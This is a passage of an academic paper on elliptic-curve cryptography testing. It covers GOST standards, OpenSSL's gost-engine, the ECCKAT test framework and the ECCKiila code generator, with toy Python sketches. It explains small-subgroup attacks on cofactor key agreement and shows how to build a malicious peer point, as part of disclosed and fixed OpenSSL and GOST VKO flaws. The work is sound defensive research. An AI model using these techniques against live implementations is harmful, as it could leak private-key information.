For example, the GOST curve id_tc26_gost_3410_2012_256_paramSetA is twist secure, with - $q$ = 0x3FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF0273220378499CA3EEA50AA93CF265, - $q'$ = 0x80000000000000000000000000000006FD8CDDF087B6635C115AF556C360C67. 2.1 GOST The system of Russian cryptographic standards (usually called GOST algorithms) started to develop in the 1980s after decades of top secret cryptography. The first Russian (or, rather, Soviet) relatively open cryptographic standard was published in 1989, describing symmetric cipher and MAC algorithms. The first Russian standard for digital signatures was developed simultaneously with DSA, and these two standards were published in 1994 with an interval of only four days. Like DSA, the Russian GOST R 34.10-94 was an ElGamal-style algorithm over a prime Galois field, but the formula was slightly different: $s = (k \cdot m + ar) \mod q$. The hash function to be used for calculating $m$ was strictly defined and described in a separate standard, based on the GOST symmetric cipher. In 2001 a new digital signature standard was adopted—the adaptation of the previous standard to elliptic curves over $\mathbb{F}_p$, allowing only $\lg(p) = 256$. The hash function was not changed. In 2012 the third Russian digital signature standard was adopted, an almost word-for-word copy of the previous standard. The only changes were (i) the length of $p$ can now be either 256 or 512 bits; (ii) the standard prescribes to use a new (completely different) hash function. The official name of the current Russian digital signature standard is GOST R 34.10-2012, and GOST R 34.11-2012 describes the hash function. English translations of these standards were published as RFC 7091 [17] and RFC 6986 [18], respectively. GOST: digital signatures.
Informally speaking and aligning with our previous notation, the Russian signature algorithm formula is $$r = ([k]g)_x \mod q, \quad s = (km + ar) \mod q$$ (7) where $a$ is the signer’s secret key, $k$ is a nonce chosen randomly and uniformly from $\{1, \ldots, q - 1\}$, $g$ is the base point of an elliptic curve, and $q$ is the order of $g$. The GOST signature successfully verifies if $z_1 = s \cdot m^{-1} \mod q$ and $z_2 = -r \cdot m^{-1} \mod q$ satisfy $$([z_1]g + [z_2]P)_x = r \mod q.$$ (8) In connection with these standards a number of subordinate standards were adopted (the Russian standardization system has different levels of standards, but the difference is more bureaucratic than practical). In parallel the corresponding RFCs were published, including several curves for use in GOST digital signature algorithms. The first three curves with $\lg(p) = 256$ were described in RFC 4357 [36] (peculiarly, for many years this was the only normative reference to these curves; their first appearance in Russian standards was in 2019). All these curves have only the trivial cofactor $h = 1$, i.e. they are cyclic groups and all curve points can be legal public keys. After the adoption of the new digital signature standard, two curves with $\lg(p) = 512$ and $h = 1$ were standardized, as well as two Twisted Edwards curves with $h = 4$: one with $\lg(p) = 256$ and the other with $\lg(p) = 512$, all described in RFC 7836 [40]. One important aspect: at the standardization level, the Twisted Edwards curves are still specified in short Weierstrass form for compatibility reasons. GOST: key generation. Russian standards say nothing about the generation of secret keys: any random number $\alpha$ between 1 and $q - 1$ can be used as a secret key. Surprisingly, despite the Russian regulatory authority paying great attention to random number generation, there is no standard for this procedure, only some classified requirements.
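The GOST equations (7)-(8) can be run on the same toy curve used for the ECDSA sketch; note that verification recovers $[z_1]g + [z_2]P = [m^{-1}(s - ra)]g = [k]g$. All values are toy choices; the real standard prescribes Streebog digests and 256/512-bit curves.

```python
# Toy GOST-style signing (7) and verification (8) on a textbook curve.
p, A = 17, 2                             # curve y^2 = x^3 + 2x + 2 over GF(17)
g, q = (5, 1), 19                        # base point of prime order 19

def add(P, Q):
    if P is None: return Q
    if Q is None: return P
    (x1, y1), (x2, y2) = P, Q
    if x1 == x2 and (y1 + y2) % p == 0:
        return None                      # P + (-P) = O
    if P == Q:
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, p) % p
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, p) % p
    x3 = (lam * lam - x1 - x2) % p
    return (x3, (lam * (x1 - x3) - y1) % p)

def mul(k, P):                           # double-and-add (not constant time!)
    R = None
    while k:
        if k & 1:
            R = add(R, P)
        P = add(P, P)
        k >>= 1
    return R

def gost_sign(a, m, k):                  # equation (7)
    r = mul(k, g)[0] % q
    s = (k * m + a * r) % q
    return r, s

def gost_verify(P, m, r, s):             # equation (8)
    z1 = s * pow(m, -1, q) % q
    z2 = -r * pow(m, -1, q) % q
    R = add(mul(z1, g), mul(z2, P))
    return R is not None and R[0] % q == r

a = 7                                    # toy secret key
P = mul(a, g)                            # public key [a]g
r, s = gost_sign(a, m=9, k=13)           # (r, s) = (16, 1)
ok_good = gost_verify(P, 9, r, s)        # True: genuine signature
ok_bad = gost_verify(P, 5, r, s)         # False: different digest
```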
The public key for a given secret one is calculated as the result of multiplication of the curve base point by the secret key. In that sense, it does not differ from other standard definitions of ECC key generation. GOST: key agreement (VKO). The VKO algorithm is defined in one of the subordinate standards and described in RFC 7836 [40]. It consists of two steps: (i) a curve point $K$ is calculated by the formula $$K = [h \cdot (UKM \cdot x \mod q)]Y$$ where $x$ is the secret key of one side, $Y$ is the public key of the other side, $UKM$ is an optional non-secret parameter (User Key Material) known by both sides, $q$ is the order of the base point, and $h$ is the cofactor of the used elliptic curve; (ii) the shared key is the hash of the affine coordinates of $K$. In this light, VKO shares similarities with ECC CDH [1], also featuring cofactor clearing but additionally utilizing $UKM$. But in contrast to NIST SP 800-108-12 [12] that accounts for (the equivalent of) $UKM$ in the subsequent key derivation hash function, VKO incorporates $UKM$ directly at the ECC level. GOST: public key encryption. The phrase "encryption according to GOST R 34.10" is often used incorrectly: actually, asymmetric encryption has never been used. Instead, VKO calculates a shared key; then a symmetric encryption algorithm uses the key for data encryption. In this light, it is hybrid encryption. 2.2 The GOST OpenSSL Engine The GOST Engine project was started during OpenSSL 1.0 development. Before OpenSSL 1.0 (released 2010) the engine mechanism allowed providing one's own digests, ciphers, random number generators, and RSA, DSA, and EC implementations. Since OpenSSL 1.0 it became possible to use OpenSSL’s engine mechanism [41] to provide custom asymmetric algorithms.
In short, gost-engine was created as a reference implementation of the Russian GOST cryptographic algorithms: the symmetric cipher GOST 28147-89, the hash algorithm GOST R 34.11-94, and the asymmetric algorithms GOST R 34.10-94 (DSA-like, now deprecated and removed) and GOST R 34.10-2001 (ECDSA-like). In 2012, support for the new Russian hash algorithm GOST R 34.11-2012 Streebog (RFC 6986 [18]) and the GOST R 34.10-2012 asymmetric algorithms (256 and 512 bits) was provided. After the publication of RFC 7836 [40] and the arrival of non-trivial cofactor support in OpenSSL, support for the new parameters based on Twisted Edwards curves was added, though the implementation itself does not use the Edwards representation and relies on OpenSSL’s EC module for the curve arithmetic. It is worth mentioning that all the parameter sets (curves) specific to GOST R 34.10-2001 are allowed for use in GOST R 34.10-2012, though the hash algorithms are different. Being OpenSSL-dependent software, gost-engine has been used many times for regression testing: not only of general engine functionality, but also of lower level OpenSSL internals such as the EC module, as discussed later in Section 3. **Deployments.** Until OpenSSL 1.1.0 (released 2016), gost-engine was a part of OpenSSL and was distributed together with it. During 1.1.0 development, the engine code was moved to a separate GitHub repository. Currently, the engine is available as a separate package in RedHat-based Linux distributions, Debian-based distributions, and the ALT Linux distribution popular in Russia. It is also widely used as an FOSS solution when there is no necessity to use the officially certified solutions. In these cases, gost-engine is often built from source instead of using the distribution-provided packages.
**Asymmetric algorithms: architecture.** Asymmetric algorithm architecture in OpenSSL requires providing two opaque callback structures per algorithm: (i) EVP_PKEY_ASN1_METHOD is a structure which holds a set of ASN.1 conversion, printing, and information methods for a specific public key algorithm; (ii) EVP_PKEY_METHOD is a structure which holds a set of methods for a specific public key cryptographic algorithm—those methods are usually used to perform different jobs, such as generating a key, signing or verifying, encrypting or decrypting, etc. Unfortunately, because of the 15-year history of the engine, the naming of the callbacks is not entirely consistent. **Asymmetric algorithms: operations.** The GOST asymmetric algorithms support the following operations: (i) key generation; (ii) digital signature and verification; (iii) key derivation; (iv) symmetric 32-byte cipher key wrap/unwrap (named encryption/decryption). The best starting point is the register_pmeth_gost function in the gost_pmeth.c file. This function provides the setting of all the necessary callbacks for the various asymmetric algorithms. Most functions are very similar and just call a shared wrapper around OpenSSL’s EC module for the elliptic curve arithmetic with different parameters such as the hash function identifier or key length. The following functions are especially worth studying. (i) gost_engine_keygen in gost_ec_keygen.c is the common function for key generation, generating a random BIGNUM in the range corresponding to the order of the selected curve’s base point and calculating the matching public key value. (ii) gost_ec_sign in gost_ec_sign.c is the common function for digital signatures according to RFC 7091. (iii) gost_ec_verify in gost_ec_sign.c is the common function for digital signature verification according to RFC 7091. (iv) pkey_gost_ec_derive in gost_ec_keyx.c is the common function for shared key derivation. This function allows two mechanisms for derivation.
The one named VKO, originally specified in RFC 4357 and deriving a 32-byte shared key, is implemented in the VKO_compute_key function in the same file. RFC 7836 defines the other one, deriving a 64-byte key and using VKO_compute_key as a step of the key derivation. Currently, the choice of the expected result is determined by the length of a protocol-defined UKM parameter. (v) pkey_gost_encrypt in gost_ec_keyx.c is the common function for symmetric key wrap using the shared key derived via pkey_gost_ec_derive. The key wrap for the GOST 28147-89 symmetric cipher is done according to RFC 4357. The key wrap for the GOST R 34.12-2015 ciphers Kuznyechik (RFC 7801) and Magma is done according to RFC 7836. (vi) pkey_gost_decrypt in gost_ec_keyx.c is the common function for symmetric key unwrap using the shared key derived via pkey_gost_ec_derive. It is the reverse of the pkey_gost_encrypt function. To summarize, regarding GOST-related ECC standards, gost-engine utilizes OpenSSL’s engine framework to its fullest—supporting key generation, key agreement (derive in OpenSSL terminology), digital signatures and verification, and hybrid encryption/decryption. It supports all curves from the relevant RFCs—all the way from the test curve, to the $h = 1$ short curves, to the $h = 4$ short curves with Twisted Edwards equivalence. In total, eight distinct curves with several Object Identifier (OID) aliases at the standardization level. ## 3 ECC UNIT TESTING: ECCKAT In this section, we present ECCKAT: a library-agnostic unit and regression testing framework for ECC implementations. The motivation for ECCKAT began with significant restructuring of OpenSSL’s EC module introduced with major release 1.1.1 (released 2018). While the library featured simple positive testing of higher-level cryptosystems such as ECDH and ECDSA, this provides very little confidence in the underlying ECC implementation.
To see why this is so, consider a scalar multiplication implementation that returns a constant: this will always pass ECDH functionality tests because the shared secret will be that constant, but is clearly broken. Similarly on the ECDSA side, consider a verification implementation that always returns true: this will always pass positive tests, but is clearly broken. With that in mind, ECCKAT uses a data-driven testing (DDT) approach heavily relying on Known Answer Tests (KATs). The high level concept is as follows: (i) collect existing KATs from various sources such as standards, RFCs, and validation efforts; (ii) augment these with negative tests and potential corner cases, and extend to arbitrary curves using an Implementation Under Test (IUT) independent implementation; (iii) output these tests in a standardized format, easily consumable downstream for integration into library-specific test harnesses. Given the wide range of curves in scope, this should be as automated as possible. In the following sections, we expand on these aspects which make up our implementation of ECCKAT. ### 3.1 Collecting Tests The purpose of this first step is to build a corpus of KATs that are already present in public documents. The goal is not only to utilize these tests but also to understand their nature, limitations, and how they can be expanded. --- Tests: ECC CDH. The NIST Cryptographic Algorithm Validation Program (CAVP)\(^3\) provides test vectors for cofactor Diffie-Hellman on the following curves: P-192, P-224, P-256, P-384, P-521, B-163, B-233, B-283, B-409, B-571, as well as the Koblitz curve variant of each binary curve. The test vectors include the following fields: dIUT, the IUT’s ephemeral private key; QIUTx, QIUTy, the IUT’s ephemeral public key; QCAVSx, QCAVSy, the peer public key; ZIUT, the resulting shared key—in this case the x-coordinate of the ECC CDH computation.
We added functionality to ECCKAT that parses these test vectors and makes them part of the unit test corpus. Tests: ECDSA. CAVP also provides ECDSA test vectors for the aforementioned curves, which in fact aggregate many types of tests. Public key validation vectors give both negative and positive tests for Qx, Qy point public keys. Negative tests include coordinates out of range (i.e. coordinates must lie in \([0, p)\) for prime curves or have sufficiently small polynomial degree for binary curves) and invalid points (i.e. points must satisfy the curve equation), anything else being a positive test. The negative tests are conceptually similar to the Project Wycheproof\(^4\) ECC-related KATs. Key generation vectors include a private key d and the resulting Qx, Qy public key point, using the default generator point. Finally, on the ECDSA side the signing vectors include the long term private key (d), corresponding public key (Qx, Qy), the message to be signed (Msg), the ECDSA nonce (k), and the resulting signature (R, S). Each test is additionally parameterized by the particular hash function to apply to Msg. The ECDSA verification vectors are similar, but omit the private information d and k, also extending to both positive and negative tests (modifying one of Msg, R, S, or the public key). We added functionality to ECCKAT that parses these test vectors and makes them part of the unit test corpus. Tests: Deterministic ECDSA. The CAVP ECDSA signing tests must parameterize by the nonce to counteract the non-determinism in stock ECDSA. In contrast, RFC 6979 [37] proposes a deterministic form of ECDSA that, at a high level, computes the nonce as a function of the private key and the message to be signed. The document provides test vectors for the exact same set of curves used in the NIST CAVP, spanning both deterministic ECDSA signing as well as key generation. We added functionality to ECCKAT that parses these test vectors and makes them part of the unit test corpus.
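The CAVP vector files share a simple line-oriented shape: `#` comments, bracketed `[...]` parameter headers, and blank-line separated blocks of `KEY = value` pairs. A minimal parser in that spirit might look like the sketch below; ECCKAT's actual parser is not shown in the paper, and the sample vector values here are invented for illustration.

```python
# Minimal parser for CAVP-style "KEY = value" test-vector files.
def parse_rsp(text):
    cases, current, section = [], {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line:                      # blank line ends a test case
            if current:
                cases.append(dict(current, section=section))
                current = {}
        elif line.startswith("#"):        # comment
            continue
        elif line.startswith("["):        # parameter/section header
            section = line.strip("[]")
        else:
            key, _, value = line.partition("=")
            current[key.strip()] = value.strip()
    if current:                           # flush the trailing case
        cases.append(dict(current, section=section))
    return cases

sample = """
# CAVP-style sample (toy values, not real vectors)
[P-256]

COUNT = 0
dIUT = 0f
ZIUT = a1b2
"""
vectors = parse_rsp(sample)
```

Each parsed case carries its parameter section alongside its fields, which is enough to route it to a curve- and operation-specific harness downstream.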
Deterministic ECDSA will likely feature in the upcoming renewed FIPS 186-5 [2]. 3.2 Augmenting Tests Based on the previously collected tests and our analysis of them, the next step is to expand these tests in several directions. First and foremost, the scope of ECCKAT is much wider: the handful of curves above is insufficient. We extended to general (legacy) curves over both prime and binary fields by utilizing the SageMath computer algebra system\(^5\). This gives us an IUT-independent ground truth during test generation. We built a large database of standardized curves with their specific curve parameters (semi-automated with the OpenSSL ecparam tool, listing over 80 standardized named curves), stored in JSON format; ECCKAT parses this database and uses the SageMath EC module to instantiate these curves given their parameters. In terms of methodology, we deemed the previously collected ECDSA and deterministic ECDSA tests sufficient. In this case, ECCKAT simply extends coverage by allowing any legacy curve, computing the expected ECDSA output with SageMath arithmetic. We treat key generation tests similarly, again simply computing scalar multiplications with SageMath. Methodology-wise, the most significant deficiency we discovered was the lack of negative tests for ECC CDH. The reason ECC CDH differs from classical Diffie-Hellman is to make sure the key agreement protocol fails for points of small order in adversarial settings. Yet, surprisingly, none of the existing tests actually checks for this. For curves of prime order, the check is implicit because ECC CDH and classical ECDH are equivalent. But all binary curves (naturally including those in the original tests) have non-trivial cofactors by definition, and all legacy curve equivalents of Edwards curves, Twisted Edwards curves, and Montgomery curves require \(h \geq 4\) (not in scope of the original tests).
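The effect of a small-order peer point on cofactor-cleared ECC CDH can be demonstrated on a toy curve with \(h \neq 1\), with brute force standing in for SageMath. The curve \(y^2 = x^3 + 4\) over \(GF(13)\) is a toy choice (it has 21 points, so \(q = 7\) and \(h = 3\)); everything below is an illustrative sketch, not ECCKAT's generator.

```python
# Build a malicious small-subgroup peer point and show that
# cofactor-cleared ECC CDH with it degenerates to O.
p, A, B = 13, 0, 4                       # toy curve y^2 = x^3 + 4 over GF(13)

def add(P, Q):
    if P is None: return Q
    if Q is None: return P
    (x1, y1), (x2, y2) = P, Q
    if x1 == x2 and (y1 + y2) % p == 0:
        return None                      # P + (-P) = O
    if P == Q:
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, p) % p
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, p) % p
    x3 = (lam * lam - x1 - x2) % p
    return (x3, (lam * (x1 - x3) - y1) % p)

def mul(k, P):                           # double-and-add (toy code)
    R = None
    while k:
        if k & 1:
            R = add(R, P)
        P = add(P, P)
        k >>= 1
    return R

points = [(x, y) for x in range(p) for y in range(p)
          if (y * y - x ** 3 - A * x - B) % p == 0]
N = len(points) + 1                      # group order, +1 for O

def order(P):
    n, R = 1, P
    while R is not None:
        R, n = add(R, P), n + 1
    return n

q = max(f for f in range(2, N + 1)
        if N % f == 0 and all(f % i for i in range(2, f)))
h = N // q                               # N = 21 = 3 * 7: q = 7, h = 3

G = next(P for P in points if order(P) == N)  # full-group generator
T = mul(q, G)                            # malicious small-subgroup peer point
alpha = 5                                # honest party's toy private key
shared = mul(h * alpha, T)               # cofactor clearing forces O
```

The honest party's result is \(O\) regardless of its private key, which is exactly the failure a negative ECC CDH test must demand.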
It is a rather peculiar dichotomy, since binary curves have mostly fallen out of use, while current ECC trends for prime curves are strongly towards these modern forms (e.g. both X25519 [6] and X448 [21] are standardized in RFC 7748 [29] and widely deployed, with e.g. codepoints in both TLS 1.2 RFC 8422 [34] and TLS 1.3 RFC 8446 [39]). When applicable, i.e. for curves with \(h \neq 1\), ECCKAT generates negative tests for ECC CDH as follows. First, with SageMath find either a generator of the full elliptic curve group, i.e. an order-\(hq\) point if the group is cyclic, or a point of maximal order in the (in practice, rare) non-cyclic case. Scalar multiplication by \(q\) then yields a malicious generator of the largest small subgroup. This is precisely the peer point that should produce ECC CDH protocol failure, since the cofactor clearing (i.e. integer multiplication between the scalar and \(h\)) will cause the resulting scalar multiplication to yield \(O\): the peer point has either order \(h\) (cyclic case) or some divisor of \(h\) (non-cyclic case). Lastly, we do note a slight deficiency in the original public key validation negative tests. They are only partial public key validation in that positive tests only ensure coordinates are in range and satisfy the curve equation. For prime-order curves, this is enough to guarantee order-\(q\) points and full public key validation is implicit. But this is not true for curves with \(h \neq 1\). We claim this is only a minor issue because it is rare for real-world implementations to carry out explicit full public key validation (i.e. checking that scalar multiplication by \(q\) yields \(O\)) at all, since it is costly and normally handled in other more efficient ways at the protocol level (e.g. with cofactor clearing). We also added select important corner cases for key generation. These include positive tests for extreme private keys (i.e.
all keys in \([1, 2^b]\) and \([q - 2^b, q]\) for some reasonable bound \(b > 1\)) and negative tests for out-of-range keys (e.g. negative, zero, \(q\) or larger). These are important because underlying scalar multiplication implementations often make assumptions about scalar ranges that may or may not be ensured higher in the call stack. --- \(^3\)https://csrc.nist.gov/projects/cryptographic-algorithm-validation-program \(^4\)https://github.com/google/wycheproof \(^5\)https://www.sagemath.org/ We feel that such augmentation is similar (in spirit) to the work of Mouha and Celi [33], which extended NIST CAVP tests to larger message lengths and led to CVE-2019-8741. 3.3 Integrating Tests With the now expanded tests, the next step is applying these tests to specific libraries. The end goal is not a one-off evaluation, but rather the ability to apply these tests in a CI setting in an automated way and to ease the integration of these unit tests into downstream projects. To that end, we now describe three backends ECCKAT currently supports. *Test Anything Protocol (TAP).* Our most generic solution drives TAP⁶ test harnesses. With roots in Perl going back to the 80s, TAP has evolved into a programming language-agnostic software testing framework made up of test producers and consumers. For this backend, ECCKAT generates shell-based tests using the Sharness⁷ portable shell library, originally developed for Git CI. The advantage of this backend is its portability and flexibility. The disadvantage is, while the TAP tests themselves are library-agnostic, the test harnesses are indeed library-specific. This means downstream projects must either parse the TAP tests themselves and convert them to a format their internal testing framework understands (worst case), or write simple (again, library-specific) test harness applications that conform to the input and output expectations of the sample harnesses.
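A TAP producer itself is tiny: a plan line `1..N` followed by one `ok`/`not ok` line per test. The sketch below emits that shape for a list of generated KAT results; the test names are invented for illustration, and it says nothing about how ECCKAT's shell-based Sharness tests are structured internally.

```python
# Sketch of a TAP (Test Anything Protocol) producer for generated KATs.
def emit_tap(results):
    """results: list of (description, passed) pairs -> TAP text."""
    lines = ["1..%d" % len(results)]           # the TAP plan line
    for i, (desc, passed) in enumerate(results, 1):
        lines.append("%s %d - %s" % ("ok" if passed else "not ok", i, desc))
    return "\n".join(lines)

tap = emit_tap([("P-256 keygen KAT", True),
                ("secp256k1 CDH negative test", False)])
print(tap)
# 1..2
# ok 1 - P-256 keygen KAT
# not ok 2 - secp256k1 CDH negative test
```

Any TAP consumer (prove, a CI harness) can then aggregate such output regardless of which library produced the underlying results.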
**OpenSSL’s testing framework.** Following CVE-2014-0160 “Heart-Bleed”, OpenSSL’s testing framework was rapidly overhauled and continues to evolve daily. At the scale of OpenSSL testing (which is mostly TAP-based), the types of tests ECCKAT produces are very low level for OpenSSL, which is much more than a cryptography library. A significant change introduced in OpenSSL 1.1.0 (2016), which, for the library, marked the switch from transparent to opaque structures, expanded the evp_test harness to generically support public key operations through OpenSSL’s high level EVP (“envelope”) interface. This is precisely the correct level to integrate ECCKAT tests. Our OpenSSL backend for ECCKAT first encodes both private and public keys to the PEM standard format. It does this using the asn1parse utility.

**GOST Engine’s testing framework.** Part of the existing gost-engine test framework is Perl TAP-driven, and this is a convenient place to integrate our ECCKAT tests. The engine already supports key generation through the OpenSSL CLI genpkey utility. As part of our work, as a FOSS contribution we extended gost-engine to support CLI key agreement through the OpenSSL pkeyutl utility. At a high level, our gost-engine backend is quite similar to the OpenSSL backend, similarly encoding ground truth key material from ECCKAT with the asn1parse utility. The differences are that the test data is embedded directly into the Perl source as a hash structure instead of a standalone test file, to match the current test framework, and that the test logic calls the relevant OpenSSL CLI utilities to form the test harness itself. Our ECCKAT gost-engine backend does not support GOST digital signatures at this time. We are currently discussing porting the deterministic ECDSA concept to GOST-style signatures. In summary, our ECCKAT gost-engine backend provides positive and negative test coverage over all GOST curves for both key generation and key agreement.

3.4 ECCKAT: Results

While we have applied and deployed ECCKAT to ECCKiila (discussed later in Section 4) in a CI environment, here we summarize our results of applying ECCKAT to other libraries. This demonstrates the flexibility and applicability of ECCKAT.
**OpenSSL: ECC scalar multiplication failure.** Applying ECCKAT to gost-engine, we identified cryptosystem failures for the id_GostR3410_2001_CryptoPro_C_ParamSet curve. Investigating the issue, OpenSSL returned failure when attempting to serialize the output point of scalar multiplication, which was incorrectly \(O\). Internal to the OpenSSL EC module, this was due to the chosen ladder projective formulae [23, Eq. 8] being undefined for a zero x-coordinate divisor, a restriction noted by neither the authors nor the EFD⁸. This caused the entire scalar multiplication computation to degenerate and eventually return failure at the software level. Broader than GOST, the \(x = 0\) case can happen whenever the prime curve coefficient \(b\) is a quadratic residue, and we integrated this test logic into ECCKAT for all curves; but the discovery was rather serendipitous. Most GOST curves choose the generator point as the smallest non-negative x-coordinate that yields a valid point, in this case \(x = 0\). Luckily, we identified this issue during the development of OpenSSL 1.1.1, hence the issue did not affect any release version of OpenSSL. We developed the fix for OpenSSL (PR #7000, switching to [23, Eq. 9]) as well as integrated our relevant tests into their testing framework.

---
⁶http://testanything.org/
⁷https://github.com/chriscool/sharness

**OpenSSL: ECC CDH vulnerability.** Applying ECCKAT to the development branch of OpenSSL 1.1.1 identified negative test failures in cofactor Diffie-Hellman. Investigating the issue revealed the cause to be mathematically incorrect side channel mitigations at the scalar multiplication level. As a timing attack countermeasure (ported from CVE-2011-1945 by [11]), the ladder code first padded the scalar by adding either $q$ or $2q$ to fix the bit length and starting iteration of the ladder loop.
But in key agreement scenarios, there is no guarantee the peer point is an order-$q$ point, only a point with order dividing $hq$ if it satisfies the curve equation, i.e. is an element of the elliptic curve group. This caused negative tests to fail for all curves with a non-trivial cofactor; for named curves in OpenSSL, this included all binary curves and the 112-bit secp112r2 Certicom curve with $h = 4$. Luckily the issue did not affect any release version of OpenSSL. We developed the fix for OpenSSL (PR #6535) as well as integrated our relevant tests into their testing framework. **GOST: VKO vulnerability.** Applying ECCKAT to gost-engine identified negative test failures in VKO key agreement for the two curves with non-trivial cofactors, similar (in spirit) to the cofactor Diffie-Hellman failures above. Investigating the issue revealed gost-engine multiplied by the cofactor before modular reduction. Consulting the Russian standard and RFC 7836 [40], surprisingly this is in fact a valid interpretation of VKO at the standardization level. Prior to the standard change and RFC errata resulting from our work, both the Russian standard and the RFC specified VKO computation as $$(m/q \cdot UKM \cdot x \bmod q) \cdot (y \cdot P)$$ where, recalling from Section 2.1, $m = hq$ is the curve cardinality, $UKM$ is user key material, $x$ is the private key, $q$ is the order of the generator, and $y \cdot P$ is the peer public key (point). With this formulation, the cofactor clearing is ineffective: it is absorbed modulo $q$. For the two curves satisfying $h = 4$, in case of a malicious $y \cdot P$ such as an order-$h$ point, the computation results in one of the four points in the order-$h$ subgroup, i.e. a small subgroup confinement attack. This can reveal the private key value modulo $h$ and, depending on the protocol, force session key reuse.
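The ineffectiveness of pre-reduction cofactor clearing can be reproduced with plain modular arithmetic. The sketch below uses toy illustrative numbers, not real GOST parameters; the "fixed" variant mirrors the corrected specification in which the cofactor is applied after the reduction.

```python
# Toy demonstration that pre-reduction cofactor clearing is absorbed mod q.
# h, q, ukm, x are illustrative toy values, NOT real GOST parameters.

def vko_scalar_flawed(m, q, ukm, x):
    # original spec: (m/q * UKM * x mod q) -- cofactor absorbed by the reduction
    return (m // q) * ukm * x % q

def vko_scalar_fixed(m, q, ukm, x):
    # corrected spec: m/q * (UKM * x mod q) -- cofactor survives the reduction
    return (m // q) * (ukm * x % q)

h, q = 4, 11          # toy cofactor and prime subgroup order
m = h * q             # curve cardinality
ukm, x = 3, 5         # user key material and private key

# The fixed scalar is always a multiple of h, so it maps any point of order
# dividing h to the identity; the flawed scalar generally is not.
assert vko_scalar_fixed(m, q, ukm, x) % h == 0
assert vko_scalar_flawed(m, q, ukm, x) % h != 0
```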
Subsequent to our work, the Russian standard and RFC 7836 [40] now specify the compatible (in the non-adversarial sense) $$(m/q \cdot (UKM \cdot x \bmod q)) \cdot (y \cdot P)$$ where it is explicit that the cofactor clearing happens after the modular reduction. As part of our work, we implemented the gost-engine fix (PR #265) and integrated all the relevant ECCKAT positive and negative tests into the gost-engine testing framework. Luckily, packaged versions of gost-engine for popular distributions such as Debian, Ubuntu, and Red Hat use older versions of the engine that only feature the $h = 1$ curves, which are not affected by this vulnerability.

4 GENERATING ECC LAYERS: ECCKIILA

This section focuses on the ECC layer generation and required library-specific rigging. Figure 1 summarizes our proposed full stack implementation, named ECCKiila. The name comes from the Finnish word *kiila*, meaning wedge. ECCKiila dynamically generates the C code for the ECC layer (supporting both 64-bit and 32-bit architectures, with no alignment or endianness assumptions) as well as the rigging for seamless integration into OpenSSL, NSS, and gost-engine, all driven by Python Mako templating. Table 1 shows all the curves tested with ECCKiila. **Field arithmetic.** In our proposal, we obtain the majority of the $GF(p)$ arithmetic by using the fiat-crypto project\(^6\), which provides generation of field-specific, formally verified, constant time code [19]. Fiat-crypto has several strategies to generate the arithmetic, and we have chosen the best per curve based on the form of $p$. The remainder of the section is centered on the EC layer that builds on top of the $GF(p)$ layer. It is important to note this is the formal verification boundary for ECCKiila: all other code on top of Fiat, while computer generated through templating and automatic formula generation for ECC arithmetic, has no formal verification guarantees. From now on, we assume all operations are performed in $GF(p)$.
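To illustrate the idea of choosing a generation strategy from the form of $p$, here is a toy heuristic. It is our own simplification and NOT fiat-crypto's actual selection logic, though the strategy names echo fiat-crypto's unsaturated-Solinas and word-by-word Montgomery modes.

```python
# Toy heuristic for picking a GF(p) arithmetic strategy by prime shape.
# Simplified stand-in for illustration; NOT fiat-crypto's actual logic.

def pick_strategy(p):
    # pseudo-Mersenne shape p = 2^k - c with small c -> specialized reduction
    for k in (p.bit_length(), p.bit_length() + 1):
        c = (1 << k) - p
        if 0 < c < (1 << 64):
            return "unsaturated-solinas"
    # anything else -> generic word-by-word Montgomery arithmetic
    return "word-by-word-montgomery"

assert pick_strategy(2**255 - 19) == "unsaturated-solinas"  # Curve25519 prime
```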
\(^6\)https://github.com/mit-plv/fiat-crypto

Short Weierstrass curves. Most of the legacy curves we consider in this work are prime order curves $E_w$, i.e. $\#E_w = q \approx p$ is a prime number and $h = 1$. Twisted Edwards curves. Recall from Section 2.2 that most of the legacy curves from gost-engine are curves $E_w$ of prime cardinality $q \approx p$, but two of them are centered on curves of cardinality $4q$, where $q \approx p$ is a prime number. For those two special curves, gost-engine curves are represented in short Weierstrass form at the specification level (i.e. “on-the-wire” or when serialized), but internally we use the Twisted Edwards curve representation. Additionally, we implemented the mappings that connect $E_w$ and $E_t$ by writing (4) and (3) in their projective form to delay the costly inversion in $GF(p)$. We used the same strategy for MDCurve20160, the “Million Dollar Curve” [5], as a research-oriented example. Point arithmetic. The way of adding points depends on the curve model being used, but we describe the three main point operations as follows: (i) the mixed point addition, which takes as inputs a projective point and an affine point, and returns a projective point; (ii) the projective point addition; and (iii) the projective point doubling, whose inputs and outputs are projective points. We use the exception-free formulas proposed by Renes et al. [38, Sec. 3] and Hisil et al. [22, Sec. 3.1, Sec. 3.3] for Weierstrass and Twisted Edwards models, respectively. In particular, all ECC arithmetic is machine generated, tied to the op3 files included in our software implementation. Our tooling is configurable in that sense, but also with high correctness confidence. Now, recall in Weierstrass models $O$ has no affine representation and thus the mixed point addition needs to catch whether the affine point describes $O$.
We solve this by asking if its affine $y$-coordinate is zero and performing a conditional copy at the end of the mixed point addition, all in constant time. That is, we set $(0,0)$ as the affine representation of $O$, which does not satisfy the affine curve equation of $E_w$ (no order-2 point exists on curves with prime cardinality, hence $y = 0$ is a contradiction). However, this is not the case for Twisted Edwards models, which allow fully exception-free formulas for point addition procedures. Point multiplication. The heart of our ECC layer is point multiplication: by a fixed point $G$, by a variable point $P$, and also the double point multiplication $[k]G + [\ell]P$. We implemented the variable point multiplication by representing scalars with the regular-NAF method [26, Sec. 3.2], using $\lg(q)/w$ digits and $\lg(q)$ doublings. The advantage of this method is that we need only half the precomputed values compared to e.g. the base-$2^w$ method. We support a variable window length $w$, by default $w = 5$. We implemented the fixed point multiplication using the comb method (see [13, Sec. 9.3.3]) with interleaving and, similar to the variable point case, using the regular-NAF scalar representation. Our approach seeks full generality and word size independence on each architecture (32 or 64 bit), hence we automatically calculate the number of comb teeth $\beta$ and the distance between consecutive teeth $\lfloor \lg(q)/\beta \rfloor$, where the latter should be a multiple of $w$, considering the size of the L1 cache in this process. Therefore, the static LUTs span $\beta$ tables requiring $\lfloor \lg(q)/\beta \rfloor$ doublings. Both methods are constant time, performing exactly $\lg(q)/w$ point additions, and using linear passes to ensure key-independent memory access not only to LUTs but also in conditional point negations due to the signed scalar representation and the conditional trailing subtraction 